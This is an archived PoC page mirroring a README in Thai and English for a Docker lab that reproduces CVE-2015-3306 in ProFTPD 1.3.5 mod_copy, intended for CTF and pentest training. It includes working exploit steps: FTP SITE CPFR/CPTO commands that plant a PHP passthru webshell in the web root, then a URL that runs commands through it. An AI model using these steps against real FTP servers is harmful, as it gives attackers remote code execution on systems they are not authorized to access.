Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
https://github.com/netw0rk7/CVE-2015-3306-Home-Lab
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5版本的mod_copy模块中存在安全漏洞。远程攻击者可借助site cpfr和site cpto命令利用该漏洞读取和写入任意文件。
Description
CVE-2015-3306 - ProFTPD - RCE Home Lab setup (Docker) easy to use for Red Teaming or Penetration Testing
Readme
# ENGLISH BELOW

# ProFTPD 1.3.5 (mod_copy) — RCE Simulation Lab  

<p align="center">
  <img width="500" height="500" alt="CVE20153306" src="https://github.com/user-attachments/assets/98e87f67-4739-4e58-83bd-1b1d56b7fed0" />
</p>

Lab นี้ถูกออกแบบเพื่อจำลองช่องโหว่ **CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE**  
ใช้สำหรับเรียนรู้ **Web Shell Injection RCE** ผ่านโมดูล `mod_copy` ของ ProFTPD

---

## Features

- ProFTPD 1.3.5 แบบ Vulnerable
- เปิดใช้ `mod_copy` เต็มรูปแบบ (`SITE CPFR` / `SITE CPTO`)
- รองรับ Anonymous FTP
- Apache2 + PHP5 สำหรับจำลอง web root `/var/www/html`
- ผู้โจมตีสามารถใช้ SITE CPFR/CPTO เพื่อ **copy file ไปยัง webroot เพื่อที่จะ trigger RCE**
- ระบบสร้าง `flag_RANDOM.txt` อัตโนมัติทุกครั้งที่ container start
- เป็น Lab สำหรับ CTF / Red Team / Pentest Training

---

## Directory Structure

```
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
```

---

## การใช้งาน (Run Container)

```bash
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
```

---

## วิธีทดสอบช่องโหว่ CVE-2015-3306

```bash
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
```

เปิดผ่านเว็บ:

```
http://<IP>/webshell.php?cmd=<command>
```

---

## Flag

เก็บไว้ใน:

```
/tmp/flag_RANDOM.txt
```

---

# English Version — ProFTPD 1.3.5 (mod_copy) RCE Lab

This lab simulates **CVE-2015-3306** using ProFTPD 1.3.5 with `mod_copy`, allowing attackers to perform **ProFTPD mod_copy Remote File Copy to RCE**.

---

## Features

- Vulnerable ProFTPD 1.3.5 compiled from source  
- `mod_copy` enabled (`SITE CPFR` + `SITE CPTO`)  
- Anonymous FTP access  
- Apache2 + PHP5 for webshell execution  
- Auto-generated `flag_RANDOM.txt` at container start  
- Perfect for CTF, education, and exploit research

---

## Exploit Testing Example

```bash
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
```

Then execute:

```
http://<IP>/webshell.php?cmd=<command>
```

---

## Flag Location

```
/tmp/flag_RANDOM.txt
```

---

## Disclaimer

For educational and authorized penetration testing only.
File Snapshot

 [4.0K]  /data/pocs/dc154ebb56fcc6c7d8f93bcb182da24be2761aad
├── [2.7K]  Dockerfile
└── [2.8K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.